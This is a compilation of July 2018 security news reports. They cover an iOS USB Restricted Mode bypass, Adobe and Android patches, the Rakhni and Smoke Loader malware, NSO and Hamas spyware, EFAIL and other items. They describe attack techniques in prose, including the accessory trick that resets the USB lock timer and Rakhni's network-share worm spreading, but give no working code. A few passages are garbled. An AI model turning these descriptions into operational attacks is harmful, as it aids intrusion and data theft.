The USB Restricted Mode was implemented in the latest beta versions of the iOS operating system, it disables the data connection of the iPhone’s Lightning port after a specific interval of time but it doesn’t interrupt the charging process.
Forensics hardware like the ones manufactured by Cellebrite and Grayshift firm will not be able to attempt brute-force attacks via the Lightning port.
While Apple proudly announced its new feature, experts from ElcomSoft have found a way to reset the countdown timer of USB Restricted Mode and bypass the defense mechanism.
The researchers discovered that by directly connecting a USB accessory to the iOS device within an hour after it was last unlocked would reset the 1-hour countdown.
A cheap Apple’s $39 Lightning to USB 3 Camera adapter could be used to bypass the security features, the experts also discovered that it is possible to bypass the USB Restricted Mode by using untrusted Lightning accessories, or those that have not been paired with the iPhone before.
“What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all).” reads the post published by ElcomSoft.
“In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.”
ElcomSoft researchers are also testing an unofficial and cheap Lightning to USB adapters to bypass the security measure.
According to the experts, the issue could be easily fixed by Apple, it is probably nothing more than an oversight.
The new feature can be enabled from Settings > Face ID (or Touch ID) & Passcode > USB Accessories, by leaving the toggle disabled.
In case you need to immediately activate the feature on the iOS device before the countdown timer ends, just press the Power button five times.
Adobe July Patch Tuesday fixes over 100 flaws in Adobe Acrobat and Reader
11.7.2018 securityaffairs Vulnerebility
Adobe released July Patch Tuesday security updates that address over 100 flaws in Acrobat and Reader, and other issues in Flash Player, Experience Manager, and Connect.
Adobe on Tuesday has released July Patch Tuesday security updates that addressed more than 100 flaws in its products, including 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.
Windows and macOS versions of Adobe Acrobat and Reader were affected by tens of critical memory corruption bugs that could be exploited by an attacker for remote code execution. The list of flaws includes double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error vulnerabilities.
“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.
The July Patch Tuesday security updates also addressed a critical privilege escalation and tens of important out-of-bounds read vulnerabilities.
Many flaws fixed by Adobe were reported to the company through the Trend Micro’s Zero-Day Initiative (ZDI).
“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 18.104.22.168 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe for Flash Player.
Adobe addressed three server-side request forgery (SSRF) vulnerabilities in Experience Manager that can lead to the exposure of sensitive information, fix authentication bypass and insecure library loading flaws in Adobe Connect. None of the flaws in Experience Manager and Adobe Connect was rated as critical.
The good news for the Adobe customers is that the company is not aware of any attack in the wild that exploited one of the flaws addressed with the July Patch Tuesday security updates.
Trojan Either Encrypts Files or Mines for Cryptocurrency
7.7.2018 securityweek Cryptocurrency
A long established ransomware family recently added the ability to deploy a cryptocurrency miner instead of file encryptor, based on the victim machine’s configuration.
The malware, which Kaspersky Lab detects as Rakhni, was first discovered in 2013 and has received numerous updates ever since. The latest feature added to the threat, however, makes it stand out from the crowd: the malware’s downloader checks the victim system and decides whether to infect it with a cryptor or a miner.
Mainly affecting users in Russia but spread worldwide, the Trojan is being distributed via spam emails with a malicious Word document attached. The file has an embedded PDF document that, once opened, launches a malicious downloader and also displays a fake error message to the victim.
The malware poses as software from Adobe, and even uses a fake digital signature featuring the name Adobe Systems Incorporated.
Once executed, it performs a series of checks to determine if it runs in a virtualized environment or if it is being analyzed, creates a registry key, and checks the process count, computer name, and IP address. The downloader also checks registry keys for specific strings associated with virtual machines, sandbox and analysis tools.
After completing this exhaustive list of checks (over 200), the threat proceeds to install a root certificate from its resources. The malware also checks for anti-virus programs on the system and can disable Windows Defender if no other AV process is found.
The downloader checks if the folder %AppData%\Bitcoin is present on the machine and drops the cryptor if it exists. If not, and there are more than two logical processors, the miner is dropped. If the folder doesn’t exist and there’s only one logical processor, the malware jumps to a worm component.
The cryptor performs its own set of checks on the machine, targets over 60 processes for termination, and only starts the encryption process if the system has been idle for 2 minutes. The malware targets nearly 200 file types for encryption, uses the RSA-1024 encryption algorithm, and appends the .neitrino to the affected files.
The miner generates a VBS script that gets launched after the system reboots, and which contains two commands to mine for Monero and Monero Original, respectively. Then, if the installation directory also contains the svchost.exe file, the malware launches it to mine for Dashcoin. A fake Microsoft certificate is used to hide the malicious process on the system.
“When this analysis was carried out, the downloader was receiving an archive with a miner that didn’t use the GPU. The attacker uses the console version of the MinerGate utility for mining,” Kaspersky explains.
The malware was also observed sending emails to a hardcoded address, to provide attackers with information such as computer name, IP address, malware’s path on the system, data and time, and malware build date, in addition to providing details on the infection itself.
The downloader was also observed attempting to spread to other computers on the local network. For that, it gets a list of network shares and then checks each computer to see if the folder Users is shared, in an attempt to copy itself to the Startup folder of each accessible user.
The malware also creates a batch file to delete all ‘temporary’ files used during infection, a rather common behavior.
Google July 2018 Android patches fixes critical vulnerabilities
7.7.2018 securityaffairs Android
This week Google released the July 2018 Android patches that address tens of vulnerabilities in the popular mobile operating system.
Google released the July 2018 Android patches that address a total of 11 vulnerabilities, including three Critical issues and 8 High-risk flaws that affect the framework, media framework, and system.
The critical vulnerabilities are remote code execution issues, the other flaws include information disclosure bugs, denial of service and elevation of privilege issues.
The most severe vulnerability affecting the Framework (CVE-2018-9433) could be exploited by a remote attacker using a specially crafted pac file to execute arbitrary code within the context of a privileged process.
“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” reads the security advisory.
The most severe vulnerability in System (CVE-2018-9365) component could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
The most severe vulnerability in the Media framework component (CVE-2018-9411) could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
Affected Android versions are Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.
Google also addressed a total of 32 vulnerabilities as part of the 2018-07-05 security patch level, 8 critical issues and 24 rated as High risk.
These vulnerabilities affect the Kernel (4 elevation of privilege bugs), Qualcomm (6, 1 Critical RCE flaw, one High severity RCE, 2 High-risk information High-risk issues, and 2 elevation of privilege vulnerabilities), and Qualcomm closed-source (22, 7 Critical issues and 15 High risk flaws) components.
New Rakhni variant could infect systems with either a ransomware or a miner
7.7.2018 securityaffairs Ransomware
Security researchers at Kaspersky Labs have discovered a new strain of the Rakhni malware that could infect systems with either a ransomware or a cryptocurrency miner.
Experts from Kaspersky Labs have discovered a new strain of the Rakhni ransomware family that could infect systems with either a ransomware or a cryptocurrency miner depending upon their configurations.
“Way back in 2013 our malware analysts spotted the first malicious samples related to the Trojan-Ransom.Win32.Rakhni family.” reads the analysis published by Kaspersky.
“Now the criminals have decided to add a new feature to their creation – a mining capability. In this article we describe a downloader that decides how to infect the victim: with a cryptor or with a miner.”
The Rakhni malware is being spread via spear-phishing messages that have weaponized MS word file in the attachment.
Once the victims opened the document, it will prompt them to save the document and enable editing. The document contains a PDF icon that if clicked will launch a malicious executable and immediately displays a fake error message box upon execution.
The message informs the victim that it is impossible to open the PDF file because a system file is missing.
In the background, the Rakhni malware makes anti-VM and anti-sandbox checks to determine if it is possible to infect the system. If the malware determines that it is possible to infect the system, it performs more checks to decide if deliver a ransomware or cryptocurrency miner.
“The decision to download the cryptor or the miner depends on the presence of the folder %AppData%\Bitcoin. If the folder exists, the downloader decides to download the cryptor.” continues the analysis.
“If the folder doesn’t exist and the machine has more than two logical processors, the miner will be downloaded. If there’s no folder and just one logical processor, the downloader jumps to its worm component, which is described below in the corresponding part of the article.”
If the target system has a ‘Bitcoin’ folder in the AppData section, the malware first terminates all processes that match a predefined list of popular applications, then encrypts files with the RSA-1024 encryption algorithm and then displays a ransom note via a text file.
Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes that match a predefined list of popular applications and then displays a ransom note via a text file.
If the ‘Bitcoin’ folder doesn’t exist and the machine has more than two logical processors the malware drops the MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background.
This variant of the Rakhni malware installs a root certificate that’s stored in its resources and every executable it downloads is signed with this certificate. We have found fake certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated.
Experts also noticed that the malware uses the CertMgr.exe utility to install fake root certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated in an attempt to disguise the miner as a trusted process.
If the infected system doesn’t have a ‘Bitcoin’ folder and has only a single logical processor, the malware activates the worm component that allows the malicious code to spread among all the computers in the local network using shared resources.
“As one of its last actions the downloader tries to copy itself to all the computers in the local network. To do so, it calls the system command ‘net view /all’ which will return all the shares and then the Trojan creates the list.log file containing the names of computers with shared resources” the researchers report.
“For each computer listed in the file the Trojan checks if the folder Users is shared and, if so, the malware copies itself to the folder \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup of each accessible user,”
The experts also noticed that the malware implements spyware capabilities.
Most of the infections are in Russia (95.5%), other systems infected with the malware are in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well.
Further details including the IoCs are reported in the analysis published by Kaspersky.
Ex-NSO Employee Accused of Stealing Spyware Source Code
6.7.2018 securityweek Virus
A former employee of Israel-based cyber arms dealer NSO Group has been accused of stealing spyware source code from the company and attempting to sell it for $50 million, Israel’s Justice Ministry announced this week.
The suspect has not been named, but court documents reveal that he’s a 38-year-old from Netanya hired by NSO as a senior programmer in the company's automation team.
According to prosecutors, NSO informs employees that they are prohibited from copying any software from work devices, a rule that is enforced using a McAfee product that can prevent external storage units from being connected to computers.
Investigators claim that the suspect searched the Web for ways to bypass the security product, methods which he used to copy both NSO software and its source code following a poor performance review from his manager.
The suspect then allegedly searched the Internet for potential buyers of the spyware. He is said to have attempted to sell the files for $50 million in cryptocurrency on the dark web, but his potential buyer alerted NSO, which led to the employee’s dismissal and arrest. Investigators found the stolen files on an external drive hidden under a mattress in the suspect’s home.
Court documents show that the suspect told the potential buyer that he was a hacker who had broken into NSO’s systems.
Authorities allege that the defendant’s actions could have harmed state security and could have led to NSO’s collapse. However, the firm told Israeli media that the stolen files were not shared with a third party.
NSO Group, a company owned by US private equity firm Francisco Partners Management, is best known for Pegasus and Chrysaor, tools designed for spying on iOS and Android phones, respectively.
In 2016, Apple released an emergency patch for iOS after researchers discovered that Pegasus had been exploiting three zero-day vulnerabilities in the mobile operating system.
NSO claims to sell its tools only to governments to help them in their fight against terrorists and criminals. However, Pegasus has apparently been abused in some cases, including in Mexico, where the government was accused last year of using it to spy on journalists and activists.
According to recent reports, Verint Systems is in talks to acquire NSO for roughly $1 billion.
Vietnam Activists Flock to 'Safe' Social Media After Cyber Crackdown
6.7.2018 securityweek Social
Tens of thousands of Vietnamese social media users are flocking to a self-professed free speech platform to avoid tough internet controls in a new cybersecurity law, activists told AFP.
The draconian law requires internet companies to scrub critical content and hand over user data if Vietnam's Communist government demands it.
The bill, which is due to take effect from January 1, sparked outcry from activists, who say it is a chokehold on free speech in a country where there is no independent press and where Facebook is a crucial lifeline for bloggers.
The world's leading social media site has 53 million users in Vietnam, a country of 93 million.
Many activists are now turning to Minds, a US-based open-source platform, fearing Facebook could be complying with the new rules.
"We want to keep our independent voice and we also want to make a point to Facebook that we're not going to accept any censorship," Tran Vi, editor of activist site The Vietnamese, which is blocked in Vietnam, told AFP from Taiwan.
Some activists say they migrated to Minds after content removal and abuse from pro-government Facebook users.
Two editors' Facebook accounts were temporarily blocked and The Vietnamese Facebook page can no longer use the "instant article" tool to post stories.
Nguyen Chi Tuyen, an activist better known by his online handle Anh Chi, says he has moved to Minds as a secure alternative, though he will continue using Facebook and Twitter.
"It's more anonymous and a secretive platform," he said of Minds.
He has previously had to hand over personal details to Facebook to verify his identity and now fears that information could be used against him.
- 'Scary' law -
About 100,000 new active users have registered in Vietnam in less than a week, many posting on politics and current affairs, Minds founder and CEO Bill Ottman told AFP.
"This new cybersecurity law is scaring a lot of people for good reason," he said from Connecticut.
"It's certainly scary to think that you could not only be censored but have your private conversations given to a government that you don't know what they're going to use that for."
The surge of new users from Vietnam now accounts for nearly 10 percent of Minds total user base of about 1.1 million.
Users are not required to register with personal data and all chats are encrypted.
Vietnam's government last year announced a 10,000-strong cybersecurity army tasked with monitoring incendiary material online.
In its unabashed defence of the new law, Vietnam has said it is aimed at protecting the regime and avoiding a "colour revolution", but refused to comment to AFP on Thursday.
Facebook told AFP it is reviewing the law and says it considers government requests to take down information in line with its Community Standards -- and pushes back when possible.
Google declined to comment on the new law when asked by AFP, but their latest Transparency report showed that it had received 67 separate requests from the Vietnamese government to remove more than 6,500 items since 2009, the majority since early last year.
Most were taken down, though Google does not provide precise data on content removal compliance.
Ottman says countries like Vietnam are fighting a losing battle trying to control online expression.
"It's like burning books, it just causes more attention to be brought to those issues and it further radicalises those users because they're so upset that they're getting censored," he said.
Chinese hackers breached into systems at Australian National University … and are still there
6.7.2018 securityaffairs BigBrothers
Chinese hackers breached into the systems of Australian National University (ANU) and according to the experts they are still there.
Chinese hackers continue to target organizations worldwide, this time attackers based in China breached into the systems of Australian National University (ANU), one of the most prestigious Australian universities.
The bad news is that experts are still working to lock the hackers out because the threat is still active in the network of the Australian University.
“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.
The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.
“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.
“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”
The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.
“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.
“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”
Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.
“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.
Australian systems are always under attack, in October 2016 a report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.
In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.
The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.
Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.
Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps
6.7.2018 securityaffairs BigBrothers
Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.
Israeli military already blamed Hamas of similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.
The experts from the Israel firm ClearSky have identified the following apps:
WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (Wordcup app)
Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.
Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January-
In January, the hackers used the profile of a woman named “Elianna Amer,” in these last attacks, that lasted at least for three months, they used the profile of a woman named “Lina Kramer.”
“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.
“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”
According to Israeli army intelligence officers, the attacks failed to damage military security.
“No damage was done, as we stopped it in time,” one of the officers said.
Th Israeli newspaper Haaretz provided a different version of the facts, it reported that at least “hundreds” of soldiers were infected.
“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.
“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”
The analysis of the apps revealed they were tainted with a spyware that can take over devices and exfiltrate sensitive data.
According to the experts, threat actor behind these attacks is codenamed Arid Viper.
In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. The Operation Arid Viper was run by Arab-speaking hackers that sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government office, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait
In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).
Thunderbird Version 52.9 addresses several issues, including the EFAIL flaw
6.7.2018 securityaffairs Vulnerebility
The Thunderbird team released a new version of the popular email client that addresses many security issued, including the EFAIL vulnerability.
Thunderbird has released a new version to address a dozen security vulnerabilities, including the EFAIL encryption issue that was discovered in May.
The new version addresses two EFAIL-related issues in the way Thunderbird handles encrypted messages.
“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers that discovered the EFAIL flaw.
“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”
The new Thunderbird 52.9 addresses the CVE-2018-12372 flaw that can be exploited by attackers to build S/MIME and PGP decryption stubs in HTML messages.
“Decrypted S/MIME parts, when included in HTML crafted for an attack, can leak plaintext when included in a HTML reply/forward.” reads the security advisory published by the Mozilla Foundation.
The new version also fixes the CVE-2018-12373 flaw that could result in the leakage of S/MIME plaintext when a message is forwarded.
Thunderbird 52.9 also addresses some critical flaws such as the CVE-2018-12359 that is a buffer overflow vulnerability that could be exploited to crash a vulnerable system
“A buffer overflow can occur when rendering canvas content while adjusting the height and width of the <canvas> element dynamically, causing data to be written outside of the currently computed boundaries.”
The new release also fixes a use-after-free flaw tracked as CVE-2018-12360 that could be exploited to crash a target system.
“A use-after-free vulnerability can occur when deleting an
element during a mutation event handler triggered by focusing that element. This results in a potentially exploitable crash.” continues the advisory.
Another security issue is related to the executable SettingContent-ms files, the security researcher Matt Nelson discovered that Windows 10 users weren’t getting warned when they were opening such kind of files. This issue was tracked as CVE-2018-12368 and could be used by attackers to execute arbitrary code by tricking users into opening the files.
“Windows 10 does not warn users before opening executable files with the SettingContent-ms extension even when they have been downloaded from the internet and have the “Mark of the Web.” continues the advisory.
“Without the warning, unsuspecting users unfamiliar with this new file type might run an unwanted executable. This also allows a WebExtension with the limited downloads.open permission to execute arbitrary code without user interaction on Windows 10 systems”.
Thunderbird also addressed some memory sasome memoryat derived from the Firefox code base.
The good news is that the bugs coild not ne directly exploitable in the e-mail client because scripting is disabled while users are reading messages.
New Smoke Loader campaign aims at stealing multiple credentials from many applications
6.7.2018 securityaffairs Virus
Recently experts from Talos security spotted a malware campaign leveraging Smoke Loader to steal credentials from a broad range of applications.
Security experts have discovered a new malware campaign leveraging Smoke Loader to steal credentials from web browsers, email clients, and other popular applications.
The attack chain starts with messages using a weaponized Word document as an attachment, the hackers attempt to trick victims into opening it and enable the embedded macro.
Once executed, the macro downloads the TrickBot banking Trojan that in this campaign is used to fetch the Smoke Loader backdoor.
Smoke Loader is a tiny dropper used to install on the infected system other malware families, but in this specific campaign, the experts observed an inversion of roles, with TrickBot that downloads it.
“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader.” reads the analysis published by Talos.
“This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,”
While malware frequently iterates through process lists to find a process to inject, this new backdoor variant calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe.
The malware also uses the PROPagate technique to inject code into Explorer, the same technique recently implemented by RIG Exploit Kit operators to deliver cryptocurrency miners.
The malware also implements several anti-analysis techniques, along with anti-debugging and anti-VM checks and the analysis of threads associated with the scanning for processes and windows belonging to analysis tools.
The Smoke Loader variant used in this campaign was receiving five plugins, each of them was executed in its own Explorer.exe process.
The plugins were designed to steal sensitive information from the infected machine and stored credentials and sensitive information managed by the web browser.
“In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan, which installed five additional Smoke Loader plugins.” continues the analysis.
“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers”
The first plugin implements roughly 2,000 functions and it is able to target a broad range of applications, including Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird, to steal hostname and credentials. This plugin also attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.
The second plugin recursively searches through directories looking for files to parse and exfiltrate.
The third plugin injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS, while the fourth hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap.
The fifth plugin injects code into TeamViewer.exe to steal credentials
“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools.” concludes the analysis.
“This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.
CipherTrace Unveils Crypto-Currency Anti-Money Laundering Solution
5.7.2018 securityweek Cryptocurrency
Cryptocurrency theft and its use to launder other illegal activity is booming. This has prompted the evolution of a related industry that sits on the borderline of legality (barely legal in some jurisdictions, illegal in others): cryptocurrency money laundering. The laundering of illegally-obtained money may be illegal, but the process used may not be.
CoinMixer is one such service that is advertised on Google Search. It says of its service, "Generally there is no link between the original transactions and the final address of the coins. This process protects your privacy and prevents other people tracing your payments on the internet." While this process can help with possibly legitimate privacy concerns, it is precisely what is required for money laundering.
Menlo Park, Calif. startup CipherTrace is a firm founded on the need for cryptocurrency anti-money laundering (AML), blockchain forensics and enforcement solutions. It aids law enforcement and financial regulators in their investigations, helps enterprises to deploy real-world cryptocurrency transactional systems within regulations, and offers a bitcoin scam and theft asset recovery service.
The CipherTrace Cryptocurrency Anti-Money Laundering Report for Q2, 2018 (PDF) shows the size of the problem; and highlights some of the regulatory discussions happening at international levels. Stolen cryptocurrency alone reached more than $750 million in the first half of 2018 -- which is already nearly three-times the amount stolen in 2017. The report also adds, "The FBI noted that the value of virtual currencies contained in the Internet Crime Center 2017 reports were $58.3M,4 citing cyber actor demands the of ransom payments, typically in virtual currency such as Bitcoin."
All this currency needs to be laundered before it can be safely accessed by the criminals. This is typically done through sites offering mixers, tumblers and chain hopping services. "The more dirty crypto money that goes into the systems and the more it moves around, the harder it becomes for investigators to see through the web of action and trace a path back to the source."
Governments and law enforcement agencies are not ignoring the use of cryptocurrencies to launder illegal gains. At the 5th Annual Europol Virtual Currency Conference, which was held at the Hague in the Netherlands, Jamal El-Hindi of the U.S. Financial Crimes Enforcement Network (FinCEN) reiterated FinCEN's position. "We will hold accountable foreign-located money transmitters, including virtual currency exchangers, that do business in the United States when they willfully violate U.S. AML laws."
The cryptocurrency theft problem that fosters the cryptocurrency laundering industry shows no sign of slowing down. It ranges from the theft of individual wallets, the use of various cryptocurrencies within ransomware extortion, and major thefts from large cryptocurrency exchanges.
"Cybercriminals follow easy money," comments High-Tech Bridge CEO Ilia Kolochenko, "and many cryptocurrency owners are the perfect victims. They are virtually unable to protect either themselves or their digital assets, being susceptible even to relatively simple phishing attacks. Law enforcement is frequently uninterested in investigating and prosecuting petty offences with digital coins theft, as they are already under water with highly-sophisticated nationwide hacks."
He points out that cryptocurrency startups are often ignorant of the fundamentals of cybersecurity, and devote all their efforts and resources to survival in an extremely volatile and highly-competitive market.
"We can almost certainly expect further proliferation of security incidents related to crypto currencies. Attackers have now established impressive infrastructure purposely tailored for large-scale theft and scams with digital coins. Owners of the crypto assets should remain extremely vigilant, maintain all their devices and installed software up-to-date, install at least a free antivirus from a reputable vendor, use two-factor authentication and unique passwords, and never entrust their wallets to any third-parties unless they have a very good reason to utterly trust them."
F-Secure security advisor Sean Sullivan has advocated for a form of 'Know Your Customer' regulation to be applied to cryptocurrency exchanges. "Bitcoin exchange accounts could be required to be tied to a physical address," Sullivan said. Currently it takes just minutes -- or seconds -- to open a Bitcoin account in a third-party market. This requirement would require an activation code that's mailed to you before an account can be opened. While this wouldn't affect criminals who do business out of Russia and China, it would make their attacks far less profitable; and would make the tracking of illegally acquired cryptocurrency by law enforcement considerably easier.
"The exchanges would hate it. But given the hundreds of millions of dollars being extorted every few months, it seems appropriate," Sullivan says. "Barring this or a similar step, exponential growth of malware families delivering these threats seems to be the only other option."
NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.2018 securityweek BigBrothers
On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.
"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."
NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.
On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."
It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.
The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.
It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.
"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."
It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.
Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."
NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."
Google Fixes Critical Android Vulnerabilities
5.7.2018 securityweek Vulnerebility
Google this week released its July 2018 set of Android patches to address tens of vulnerabilities in the mobile operating system, including several rated as Critical.
The Internet giant addressed 11 vulnerabilities as part of the 2018-07-01 security patch level, including three rated Critical and 8 High risk bugs. The issues impact framework, media framework, and system.
All three Critical severity bugs are remote code execution flaws, one for each of the impacted components. The remaining vulnerabilities include information disclosure bugs, elevation of privilege issues, and denial of service flaws.
“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in an advisory.
Affected operating system versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.
A total of 32 flaws were addressed as part of the 2018-07-05 security patch level, 8 rated Critical severity and 24 considered High risk.
These issues impact Kernel, Qualcomm, and Qualcomm closed-source components such as IPV6 stack, futex, USB driver, WLAN, nsfs, OpenGL ES driver, and ADSPRPC heap manager.
Of the resolved vulnerabilities, 22 were impacting Qualcomm closed-source components. These include 7 Critical issues and 15 High risk flaws.
6 vulnerabilities were addressed in Qualcomm components, including a Critical remote code execution flaw, one High severity remote code execution bug, two High risk information disclosure issues, and two elevation of privilege vulnerabilities.
All of the 4 flaws addressed in Kernel components were elevation of privilege bugs.
This month, Google also addressed 26 Medium severity issues impacting Pixel and Nexus devices. Affected components include framework, media framework, system, Kernel components, and Qualcomm components.
Most of the addressed issues were elevation of privilege bugs, but remote code execution and information disclosure security vulnerabilities were also addressed.
Additionally, the Internet giant released a functional update for the Pixel and Nexus devices, to “improve consistency of Wi-Fi connections with certain routers,” the advisory reads.
Last month, Google addressed a dozen Critical flaws in Android, along with tens of High risk issues. The company also resolved over 60 vulnerabilities affecting Pixel and Nexus devices, most of which were rated Medium severity.